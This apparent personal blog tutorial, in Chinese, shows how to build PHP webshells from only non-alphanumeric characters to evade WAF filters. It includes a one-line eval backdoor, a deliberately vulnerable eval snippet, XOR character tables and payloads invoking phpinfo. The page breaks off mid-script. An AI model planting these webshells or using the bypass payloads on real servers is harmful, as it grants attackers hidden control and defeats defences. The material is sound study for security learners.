<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>无字符数字Webshell | LeEas1na、一名思想滑坡的大学生，此博客用来分享和温习知识点</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="不包含数字和字母的Webshell构造0x01:Webshell的原理​        Webshell是一种代码执行的环境，在各类系统中起到了一个后门backdoor的作用，可以通过向目标植入Webshell，进行一系列命令，从而掌握对目标的控制权。 1234&lt;?php  @eval($_REQUEST[&amp;#x27;shell&amp;#x27;]);?&gt;&#x2F;&#x2F;PHP一句话木马,各类的一句话网">
<meta property="og:type" content="article">
<meta property="og:title" content="无字符数字Webshell">
<meta property="og:url" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/index.html">
<meta property="og:site_name" content="LeEas1na、一名思想滑坡的大学生，此博客用来分享和温习知识点">
<meta property="og:description" content="不包含数字和字母的Webshell构造0x01:Webshell的原理​        Webshell是一种代码执行的环境，在各类系统中起到了一个后门backdoor的作用，可以通过向目标植入Webshell，进行一系列命令，从而掌握对目标的控制权。 1234&lt;?php  @eval($_REQUEST[&amp;#x27;shell&amp;#x27;]);?&gt;&#x2F;&#x2F;PHP一句话木马,各类的一句话网">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219121106291.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219134311640.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219121335447.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219135203835.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219171822116.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219175011538.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219154318018.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219165241124.png">
<meta property="og:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219150351565.png">
<meta property="article:published_time" content="2020-12-16T11:53:49.000Z">
<meta property="article:modified_time" content="2020-12-19T11:16:30.297Z">
<meta property="article:author" content="LeEas1na">
<meta property="article:tag" content="奇技淫巧">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://leeasina.github.io/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219121106291.png">
  
    <link rel="alternate" href="/atom.xml" title="LeEas1na、一名思想滑坡的大学生，此博客用来分享和温习知识点" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">LeEas1na、一名思想滑坡的大学生，此博客用来分享和温习知识点</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://Leeasina.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-无字符数字Webshell" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/" class="article-date">
  <time class="dt-published" datetime="2020-12-16T11:53:49.000Z" itemprop="datePublished">2020-12-16</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      无字符数字Webshell
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="不包含数字和字母的Webshell构造"><a href="#不包含数字和字母的Webshell构造" class="headerlink" title="不包含数字和字母的Webshell构造"></a>不包含数字和字母的Webshell构造</h1><h2 id="0x01-Webshell的原理"><a href="#0x01-Webshell的原理" class="headerlink" title="0x01:Webshell的原理"></a>0x01:Webshell的原理</h2><p>​        Webshell是一种代码执行的环境，在各类系统中起到了一个后门backdoor的作用，可以通过向目标植入Webshell，进行一系列命令，从而掌握对目标的控制权。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"> @<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;shell&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//PHP一句话木马,各类的一句话网上都有很多：aspx,jsp,asp等诸如此类自己谷歌即可</span></span><br></pre></td></tr></table></figure>

<h2 id="0x02-为什么构造无字母webshell"><a href="#0x02-为什么构造无字母webshell" class="headerlink" title="0x02:为什么构造无字母webshell"></a>0x02:为什么构造无字母webshell</h2><p>​        由于存在很多类型的WAF，导致普通Webshell被拦无法写入，所以要构造特殊的字符绕过过滤，这里拿字母和数字过滤作为WAF点。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/[a-z0-9]/is&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;shell&#x27;</span>])) &#123;</span><br><span class="line">  <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;shell&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="0x03-构造的几种方法"><a href="#0x03-构造的几种方法" class="headerlink" title="0x03:构造的几种方法"></a>0x03:构造的几种方法</h2><h4 id="异或绕过："><a href="#异或绕过：" class="headerlink" title="异或绕过："></a>异或绕过：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">128</span>;<span class="variable">$i</span> &lt; <span class="number">255</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">    <span class="keyword">echo</span> sprintf(<span class="string">&quot;%s^%s&quot;</span>, urlencode(chr(<span class="variable">$i</span>)), urlencode(chr(<span class="number">255</span>))).<span class="string">&quot;=&gt;&quot;</span>.(chr(<span class="variable">$i</span>) ^ chr(<span class="number">255</span>)) . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">%81^%FF=&gt;~     %82^%FF=&gt;&#125;       %83^%FF=&gt;|</span></span><br><span class="line"><span class="comment">%84^%FF=&gt;&#123;     %85^%FF=&gt;z       %86^%FF=&gt;y</span></span><br><span class="line"><span class="comment">%87^%FF=&gt;x     %88^%FF=&gt;w       %89^%FF=&gt;v</span></span><br><span class="line"><span class="comment">%8A^%FF=&gt;u     %8B^%FF=&gt;t       %8C^%FF=&gt;s</span></span><br><span class="line"><span class="comment">%8D^%FF=&gt;r     %8E^%FF=&gt;q       %8F^%FF=&gt;p</span></span><br><span class="line"><span class="comment">%90^%FF=&gt;o     %91^%FF=&gt;n       %92^%FF=&gt;m</span></span><br><span class="line"><span class="comment">%93^%FF=&gt;l     %94^%FF=&gt;k       %95^%FF=&gt;j</span></span><br><span class="line"><span class="comment">%96^%FF=&gt;i     %97^%FF=&gt;h       %98^%FF=&gt;g</span></span><br><span class="line"><span class="comment">%99^%FF=&gt;f     %9A^%FF=&gt;e       %9B^%FF=&gt;d</span></span><br><span class="line"><span class="comment">%9C^%FF=&gt;c     %9D^%FF=&gt;b       %9E^%FF=&gt;a</span></span><br><span class="line"><span class="comment">%9F^%FF=&gt;`     %A0^%FF=&gt;_       %A1^%FF=&gt;^</span></span><br><span class="line"><span class="comment">%A2^%FF=&gt;]     %A3^%FF=&gt;\       %A4^%FF=&gt;[</span></span><br><span class="line"><span class="comment">%A5^%FF=&gt;Z     %A6^%FF=&gt;Y       %A7^%FF=&gt;X</span></span><br><span class="line"><span class="comment">%A8^%FF=&gt;W     %A9^%FF=&gt;V       %AA^%FF=&gt;U</span></span><br><span class="line"><span class="comment">%AB^%FF=&gt;T     %AC^%FF=&gt;S       %AD^%FF=&gt;R    </span></span><br><span class="line"><span class="comment">%AE^%FF=&gt;Q     %AF^%FF=&gt;P       %B0^%FF=&gt;O</span></span><br><span class="line"><span class="comment">%B1^%FF=&gt;N     %B2^%FF=&gt;M       %B3^%FF=&gt;L</span></span><br><span class="line"><span class="comment">%B4^%FF=&gt;K     %B5^%FF=&gt;J       %B6^%FF=&gt;I</span></span><br><span class="line"><span class="comment">%B7^%FF=&gt;H     %B8^%FF=&gt;G       %B9^%FF=&gt;F</span></span><br><span class="line"><span class="comment">%BA^%FF=&gt;E     %BB^%FF=&gt;D       %BC^%FF=&gt;C</span></span><br><span class="line"><span class="comment">%BD^%FF=&gt;B     %BE^%FF=&gt;A       %BF^%FF=&gt;@</span></span><br><span class="line"><span class="comment">%C0^%FF=&gt;?</span></span><br></pre></td></tr></table></figure>

<p>​        </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##Special words formation</span></span><br><span class="line"><span class="built_in">str</span> = <span class="string">r&quot;~!@#$%^&amp;*()_+&lt;&gt;?,.;:-[]&#123;&#125;\/&quot;</span></span><br><span class="line">stR = <span class="string">r&quot;qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(<span class="built_in">str</span>)):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(<span class="built_in">str</span>)):</span><br><span class="line">        a = <span class="built_in">ord</span>(<span class="built_in">str</span>[i])^<span class="built_in">ord</span>(<span class="built_in">str</span>[j])</span><br><span class="line">        c = a</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">chr</span>(c) <span class="keyword">in</span> stR:</span><br><span class="line">       <span class="comment">#if chr(c) in &#x27;phpinfo&#x27;: </span></span><br><span class="line">       <span class="comment">#if chr(c) in &#x27;get_&#x27;:  </span></span><br><span class="line">            print(<span class="built_in">str</span>[i] + <span class="string">&#x27;^ &#x27;</span> + <span class="built_in">str</span>[j] + <span class="string">&#x27;=&gt;&#x27;</span> + <span class="built_in">chr</span>(c))</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">result:</span></span><br><span class="line"><span class="string">~ ^ $ =&gt; Z		~ ^ &amp; =&gt; X		~ ^ * =&gt; T</span></span><br><span class="line"><span class="string">~ ^ ( =&gt; V		~ ^ ) =&gt; W		~ ^ + =&gt; U</span></span><br><span class="line"><span class="string">~ ^ &lt; =&gt; B		~ ^ ? =&gt; A		~ ^ , =&gt; R</span></span><br><span class="line"><span class="string">~ ^ . =&gt; P		~ ^ ; =&gt; E		~ ^ : =&gt; D</span></span><br><span class="line"><span class="string">~ ^ - =&gt; S		~ ^ / =&gt; Q		! ^ @ =&gt; a</span></span><br><span class="line"><span class="string">! ^ [ =&gt; z		! ^ &#123; =&gt; Z		@ ^ ! =&gt; a</span></span><br><span class="line"><span class="string">@ ^ # =&gt; c		@ ^ $ =&gt; d		@ ^ % =&gt; e</span></span><br><span class="line"><span class="string">@ ^ &amp; =&gt; f		@ ^ * =&gt; j		@ ^ ( =&gt; h</span></span><br><span class="line"><span class="string">@ ^ ) =&gt; i		@ ^ + =&gt; k		@ ^ , =&gt; l</span></span><br><span class="line"><span class="string">@ ^ . =&gt; n		@ ^ : =&gt; z		@ ^ - =&gt; m</span></span><br><span class="line"><span class="string">@ ^ / =&gt; o		# ^ @ =&gt; c		# ^ [ =&gt; x</span></span><br><span class="line"><span class="string"># ^ &#123; =&gt; X		$ ^ ~ =&gt; Z		$ ^ @ =&gt; d</span></span><br><span class="line"><span class="string">$ ^ ^ =&gt; z		$ ^ ] =&gt; y		$ ^ &#125; =&gt; Y</span></span><br><span class="line"><span class="string">$ ^ \ =&gt; x		% ^ @ =&gt; e		% ^ _ =&gt; z</span></span><br><span class="line"><span class="string">% ^ ] =&gt; x		% ^ &#125; =&gt; X		% ^ \ =&gt; y</span></span><br><span class="line"><span class="string">^ ^ $ =&gt; z		^ ^ &amp; =&gt; x		^ ^ * =&gt; t</span></span><br><span class="line"><span class="string">^ ^ ( =&gt; v		^ ^ ) =&gt; w		^ ^ + =&gt; u</span></span><br><span class="line"><span class="string">^ ^ &lt; =&gt; b		^ ^ ? =&gt; a		^ ^ , =&gt; r</span></span><br><span class="line"><span class="string">^ ^ . =&gt; p		^ ^ ; =&gt; e		^ ^ : =&gt; d</span></span><br><span class="line"><span class="string">^ ^ - =&gt; s		^ ^ / =&gt; q		&amp; ^ ~ =&gt; X</span></span><br><span class="line"><span class="string">&amp; ^ @ =&gt; f		&amp; ^ ^ =&gt; x		&amp; ^ _ =&gt; y</span></span><br><span class="line"><span class="string">&amp; ^ \ =&gt; z		* ^ ~ =&gt; T		* ^ @ =&gt; j</span></span><br><span class="line"><span class="string">* ^ ^ =&gt; t		* ^ _ =&gt; u		* ^ [ =&gt; q</span></span><br><span class="line"><span class="string">* ^ ] =&gt; w		* ^ &#123; =&gt; Q		* ^ &#125; =&gt; W</span></span><br><span class="line"><span class="string">* ^ \ =&gt; v		( ^ ~ =&gt; V		( ^ @ =&gt; h</span></span><br><span class="line"><span class="string">( ^ ^ =&gt; v		( ^ _ =&gt; w		( ^ [ =&gt; s</span></span><br><span class="line"><span class="string">( ^ ] =&gt; u		( ^ &#123; =&gt; S		( ^ &#125; =&gt; U		</span></span><br><span class="line"><span class="string">( ^ \ =&gt; t		) ^ ~ =&gt; W		) ^ @ =&gt; i</span></span><br><span class="line"><span class="string">) ^ ^ =&gt; w		) ^ _ =&gt; v		) ^ [ =&gt; r</span></span><br><span class="line"><span class="string">) ^ ] =&gt; t		) ^ &#123; =&gt; R		) ^ &#125; =&gt; T</span></span><br><span class="line"><span class="string">) ^ \ =&gt; u		_ ^ % =&gt; z		_ ^ &amp; =&gt; y</span></span><br><span class="line"><span class="string">_ ^ * =&gt; u		_ ^ ( =&gt; w		_ ^ ) =&gt; v</span></span><br><span class="line"><span class="string">_ ^ + =&gt; t		_ ^ &lt; =&gt; c		_ ^ &gt; =&gt; a</span></span><br><span class="line"><span class="string">_ ^ , =&gt; s		_ ^ . =&gt; q		_ ^ ; =&gt; d</span></span><br><span class="line"><span class="string">_ ^ : =&gt; e		_ ^ - =&gt; r		_ ^ / =&gt; p</span></span><br><span class="line"><span class="string">+ ^ ~ =&gt; U		+ ^ @ =&gt; k		+ ^ ^ =&gt; u</span></span><br><span class="line"><span class="string">+ ^ _ =&gt; t		+ ^ [ =&gt; p		+ ^ ] =&gt; v</span></span><br><span class="line"><span class="string">+ ^ &#123; =&gt; P		+ ^ &#125; =&gt; V		+ ^ \ =&gt; w</span></span><br><span class="line"><span class="string">&lt; ^ ~ =&gt; B		&lt; ^ ^ =&gt; b		&lt; ^ _ =&gt; c</span></span><br><span class="line"><span class="string">&lt; ^ [ =&gt; g		&lt; ^ ] =&gt; a		&lt; ^ &#123; =&gt; G</span></span><br><span class="line"><span class="string">&lt; ^ &#125; =&gt; A		&gt; ^ _ =&gt; a		&gt; ^ [ =&gt; e</span></span><br><span class="line"><span class="string">&gt; ^ ] =&gt; c		&gt; ^ &#123; =&gt; E		&gt; ^ &#125; =&gt; C	</span></span><br><span class="line"><span class="string">&gt; ^ \ =&gt; b		? ^ ~ =&gt; A		? ^ ^ =&gt; a</span></span><br><span class="line"><span class="string">? ^ [ =&gt; d		? ^ ] =&gt; b		? ^ &#123; =&gt; D</span></span><br><span class="line"><span class="string">? ^ &#125; =&gt; B		? ^ \ =&gt; c		, ^ ~ =&gt; R</span></span><br><span class="line"><span class="string">, ^ @ =&gt; l		, ^ ^ =&gt; r		, ^ _ =&gt; s</span></span><br><span class="line"><span class="string">, ^ [ =&gt; w		, ^ ] =&gt; q		, ^ &#123; =&gt; W</span></span><br><span class="line"><span class="string">, ^ &#125; =&gt; Q		, ^ \ =&gt; p		. ^ ~ =&gt; P</span></span><br><span class="line"><span class="string">. ^ @ =&gt; n		. ^ ^ =&gt; p		. ^ _ =&gt; q</span></span><br><span class="line"><span class="string">. ^ [ =&gt; u		. ^ ] =&gt; s		. ^ &#123; =&gt; U</span></span><br><span class="line"><span class="string">. ^ &#125; =&gt; S		. ^ \ =&gt; r		; ^ ~ =&gt; E</span></span><br><span class="line"><span class="string">; ^ ^ =&gt; e		; ^ _ =&gt; d		; ^ ] =&gt; f</span></span><br><span class="line"><span class="string">; ^ &#125; =&gt; F		; ^ \ =&gt; g		: ^ ~ =&gt; D</span></span><br><span class="line"><span class="string">: ^ @ =&gt; z		: ^ ^ =&gt; d		: ^ _ =&gt; e</span></span><br><span class="line"><span class="string">: ^ [ =&gt; a		: ^ ] =&gt; g		: ^ &#123; =&gt; A</span></span><br><span class="line"><span class="string">: ^ &#125; =&gt; G		: ^ \ =&gt; f		- ^ ~ =&gt; S</span></span><br><span class="line"><span class="string">- ^ @ =&gt; m		- ^ ^ =&gt; s		- ^ _ =&gt; r</span></span><br><span class="line"><span class="string">- ^ [ =&gt; v		- ^ ] =&gt; p		- ^ &#123; =&gt; V</span></span><br><span class="line"><span class="string">- ^ &#125; =&gt; P		- ^ \ =&gt; q		[ ^ ! =&gt; z</span></span><br><span class="line"><span class="string">[ ^ # =&gt; x		[ ^ * =&gt; q		[ ^ ( =&gt; s</span></span><br><span class="line"><span class="string">[ ^ ) =&gt; r		[ ^ + =&gt; p		[ ^ &lt; =&gt; g</span></span><br><span class="line"><span class="string">[ ^ &gt; =&gt; e		[ ^ ? =&gt; d		[ ^ , =&gt; w</span></span><br><span class="line"><span class="string">[ ^ . =&gt; u		[ ^ : =&gt; a		[ ^ - =&gt; v</span></span><br><span class="line"><span class="string">[ ^ / =&gt; t		] ^ $ =&gt; y		] ^ % =&gt; x</span></span><br><span class="line"><span class="string">] ^ * =&gt; w		] ^ ( =&gt; u		] ^ ) =&gt; t</span></span><br><span class="line"><span class="string">] ^ + =&gt; v		] ^ &lt; =&gt; a		] ^ &gt; =&gt; c</span></span><br><span class="line"><span class="string">] ^ ? =&gt; b		] ^ , =&gt; q		] ^ . =&gt; s</span></span><br><span class="line"><span class="string">] ^ ; =&gt; f		] ^ : =&gt; g		] ^ - =&gt; p</span></span><br><span class="line"><span class="string">] ^ / =&gt; r		&#123; ^ ! =&gt; Z		&#123; ^ # =&gt; X</span></span><br><span class="line"><span class="string">&#123; ^ * =&gt; Q		&#123; ^ ( =&gt; S		&#123; ^ ) =&gt; R</span></span><br><span class="line"><span class="string">&#123; ^ + =&gt; P		&#123; ^ &lt; =&gt; G		&#123; ^ &gt; =&gt; E</span></span><br><span class="line"><span class="string">&#123; ^ ? =&gt; D		&#123; ^ , =&gt; W		&#123; ^ . =&gt; U</span></span><br><span class="line"><span class="string">&#123; ^ : =&gt; A		&#123; ^ - =&gt; V		&#123; ^ / =&gt; T</span></span><br><span class="line"><span class="string">&#125; ^ $ =&gt; Y		&#125; ^ % =&gt; X		&#125; ^ * =&gt; W</span></span><br><span class="line"><span class="string">&#125; ^ ( =&gt; U		&#125; ^ ) =&gt; T		&#125; ^ + =&gt; V</span></span><br><span class="line"><span class="string">&#125; ^ &lt; =&gt; A		&#125; ^ &gt; =&gt; C		&#125; ^ ? =&gt; B</span></span><br><span class="line"><span class="string">&#125; ^ , =&gt; Q		&#125; ^ . =&gt; S		&#125; ^ ; =&gt; F</span></span><br><span class="line"><span class="string">&#125; ^ : =&gt; G		&#125; ^ - =&gt; P		&#125; ^ / =&gt; R</span></span><br><span class="line"><span class="string">\ ^ $ =&gt; x		\ ^ % =&gt; y		\ ^ &amp; =&gt; z</span></span><br><span class="line"><span class="string">\ ^ * =&gt; v		\ ^ ( =&gt; t		\ ^ ) =&gt; u</span></span><br><span class="line"><span class="string">\ ^ + =&gt; w		\ ^ &gt; =&gt; b		\ ^ ? =&gt; c</span></span><br><span class="line"><span class="string">\ ^ , =&gt; p		\ ^ . =&gt; r		\ ^ ; =&gt; g</span></span><br><span class="line"><span class="string">\ ^ : =&gt; f		\ ^ - =&gt; q		\ ^ / =&gt; s</span></span><br><span class="line"><span class="string">/ ^ ~ =&gt; Q		/ ^ @ =&gt; o		/ ^ ^ =&gt; q</span></span><br><span class="line"><span class="string">/ ^ _ =&gt; p		/ ^ [ =&gt; t		/ ^ ] =&gt; r</span></span><br><span class="line"><span class="string">/ ^ &#123; =&gt; T		/ ^ &#125; =&gt; R		/ ^ \ =&gt; s</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>​        举例：利用该方法构造一个phpinfo()函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">%B8^%FF=&gt;G  %BA^%FF=&gt;E  %AB^%FF=&gt;T  %A0^%FF=&gt;_  <span class="comment">//_GET</span></span><br><span class="line">^ ^ .=&gt;p	@ ^ (=&gt;h	@ ^ )=&gt;i	@ ^ .=&gt;n	&amp; ^ @=&gt;f	@ ^ /=&gt;o</span><br><span class="line">构造模板：</span><br><span class="line">    $&#123;_GET&#125;&#123;%ff&#125;();&amp;%ff=phpinfo		<span class="comment">//content from php</span></span><br><span class="line">    </span><br><span class="line">    $&#123;<span class="string">&quot;`&#123;&#123;&#123;&quot;</span>^<span class="string">&quot;?&lt;&gt;/&quot;</span>&#125;&#123;_&#125;();&amp;_=phpinfo		<span class="comment">//content from python</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = urldecode(<span class="string">&#x27;%ff%ff%ff%ff&#x27;</span>);</span><br><span class="line"><span class="variable">$b</span> = urldecode(<span class="string">&#x27;%a0%b8%ba%ab&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>^<span class="variable">$b</span>;		<span class="comment">//_GET</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//payload:</span></span><br><span class="line"><span class="comment">//1) $&#123;%ff%ff%ff%ff^%a0%b8%ba%ab&#125;&#123;%ff&#125;();&amp;%ff=phpinfo</span></span><br><span class="line"><span class="comment">//2) $&#123;&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;&#125;&#123;_&#125;();&amp;_=phpinfo </span></span><br></pre></td></tr></table></figure>



<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219121106291.png"></p>
<p><img src="/2020/12/16/%E6%97%A0%E5%AD%97%E7%AC%A6%E6%95%B0%E5%AD%97Webshell/image-20201219134311640.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//自动构造异或脚本 $a = &quot;result1&quot;^&quot;result2&quot;;   == $shell</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$shell</span> = <span class="string">&quot;_GET&quot;</span>;</span><br><span class="line"><span class="variable">$result1</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="variable">$result2</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$num</span>=<span class="number">0</span>;<span class="variable">$num</span>&lt;=strlen(<span class="variable">$shell</span>);<span 